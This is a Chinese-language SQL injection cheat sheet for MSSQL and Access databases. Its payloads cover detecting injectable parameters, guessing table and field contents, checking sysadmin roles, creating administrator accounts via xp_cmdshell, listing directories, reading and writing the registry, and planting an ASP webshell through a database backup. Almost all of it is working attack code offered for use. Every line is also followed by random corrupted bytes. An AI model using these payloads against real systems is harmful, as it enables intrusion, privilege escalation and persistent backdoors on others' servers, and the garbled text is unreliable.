1.判断是否有注入;and 1=1 ;and 1=2 =h,�J�!0Y�
2.初步判断是否是mssql ;and user>0 oq[r+E-]$@
C=8I�Ql[^e
3.注入参数是字符'and [查询条件] and ''=' `*y%[�J,I#
� [
@��9a
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �@B��Mu�ov
� & {=�}U�
5.判断数据库系统 [7h�/ 2La#
�/�>2zKF?
;and (select count(*) from sysobjects)>0 mssql to(lE2`.da
�hr`,s!0�Y
;and (select count(*) from msysobjects)>0 access Ksk�PFXx�P
d��ZuP�R��
~WK�Wx�.ul
����h�p$1c
6.猜数据库 ;and (select Count(*) from [数据库名])>0 p
Cgm!t?/�
ZD�x1v_x�r
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �g5lK&-yu]
l�._g�[�qa
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 =4
NKXP�~C
BMIt�Hn�].
9.(1)猜字段的ascii值(access) �=kjD ]+�l
: $N43_�Wb
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 N*SUA4bnuM
@�`XbM7D 5
(2)猜字段的ascii值(mssql) 58t�~? 2�E
h(p �c��GE
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 A@jB��n�6�
#@�m��6ag.
10.测试权限结构(mssql) 2hY"bpGW��
k_�`YVsEYP
q�Ai:F=> X
4"#F��=f0
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- CP�cB1�7�!
X3HJ3F�;==
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- J�~)JsAXAI
��&neB$m3y
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- {�m/KD 'b_
u�bQr[�/�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- EOXu�c9>G
�[~ !9t9+~
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��e�N0lJ�~
�?;G�XFKy
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- oF_
'<\ly=
;��i!�$rL�
;and 1=(select IS_MEMBER('db_owner'));-- ��Z_�s]2y1
H/l,;/q]b
l�c�Xo��>�
)i�[K1$x2�
11.添加mssql和系统的帐户 F&HvSt}l�5
N�`O0jH{��
;exec master.dbo.sp_addlogin username;-- >N"=1����0
;exec master.dbo.sp_password null,username,password;-- z��vwv7JtB
�}ISR +./+
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �vHN/~�k�#
\�m(>�Q���
;exec master.dbo.xp_cmdshell 'net user username password zz #IY'dwT
&?#
�YjU"
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- HG^�~7�oMf
LBIE�G_�/m
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �4i�Y
<7l8
R�p
!Rzl<�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- lL�&p?MU�p
�b6g/�SIae
c*",A�Z>�U
1;HL=F���
12.(1)遍历目录 2�]}�e4�@{
Ct]?��� /
;create table dirs(paths varchar(100), id int) /w2N�O�9�Q
Sg1�,9[pb�
;insert dirs exec master.dbo.xp_dirtree 'c:\' m�}t`43}QE
!,��{-q)'D
;and (select top 1 paths from dirs)>0 -BH T'zq1S
dTqL[?wH?�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) = Q"(9[A�z
O^IS:\JX�&
3�
<Zo{;
�64D�4*G�Q
(2)遍历目录
pp()Hu3J
wrVR[�v>E<
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 0>:`|IGnT2
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 NN~PWy1opa
$�'�KhA6�u
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 caZEZk#r;
�GK��&R.R]
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �CJ�[e^K{�
qW�Ja�p-hb
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 {����'cdi`
Vk%�W4P�"l
j#${L6���
H%;pPkI�i�
13.mssql中的存储过程 �T�j=@5lj0
'grb@�+w(�
xp_regenumvalues 注册表根键, 子键 |�T{ZD��J+
5#::��42oE
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 iOiXo6YE
X
[;n1�49o
xp_regread 根键,子键,键值名 h([�qq<Lzs
�\3whM6t�K
;exec xp_regread �0�gr#<�(
5D>�c�bzP@
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 XQcE
��ZJ2
S�9� @*g3�
xp_regwrite 根键,子键, 值名, 值类型, 值 5K00z?kD2V
Y{L|ja%9?�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ��10����*^
wV'_{��/WM
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 V�,eH E5C�
e)oi3d.wJf
xp_regdeletevalue 根键,子键,值名 Hr/J6�kyB)
Z$S0X�$q�}
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 B��|S��X?X
� =h}P�L22
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �'>>@I�~<\
�3Z74&a�$�
~HXZ�-�*�
)T@+"Pw8t�
14.mssql的backup创建webshell `7�'=~BP?X
aW���b5��w
use model >2to�sxH M
�!&�o>zU�.
create table cmd(str image); �r�8!�M8Sc
{�=_xz�e)�
insert into cmd(str) values (''); �7/BA!V(na
"���H}ae7@
backup database model to disk='c:\l.asp'; (���Jk:Qz5
q,�(hs]\�@
Do;rY\s�Y�
�v9Ez0 �:)
15.mssql内置函数 �OoR0>!x Z
k�Y�kck�]|
;and (select @@version)>0 获得Windows的版本号 �7s1LK/R|u
5fK<DkB$>:
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Xj21:IM�R�
K|.�!��)L�
;and (select user_name())>0 爆当前系统的连接用户 XP�cx"�zv\
� Fr9_!f��
;and (select db_name())>0 得到当前连接的数据库 'w}/�o�+x@
SMh[7lU��`
D]�d2opBLj
k��k3G~o�+
16.简洁的webshell �JC4Z^/�\.
eh$�T
3_#q
use model |H��K/*B��
$���-f(.S�
create table cmd(str image); w��~Vqd�B�
a5�%IjgQ&z
insert into cmd(str) values (''); g�
[�+�_T{
u�/L�\�e.4
backup database model to disk='g:\wwwtest\l.asp';
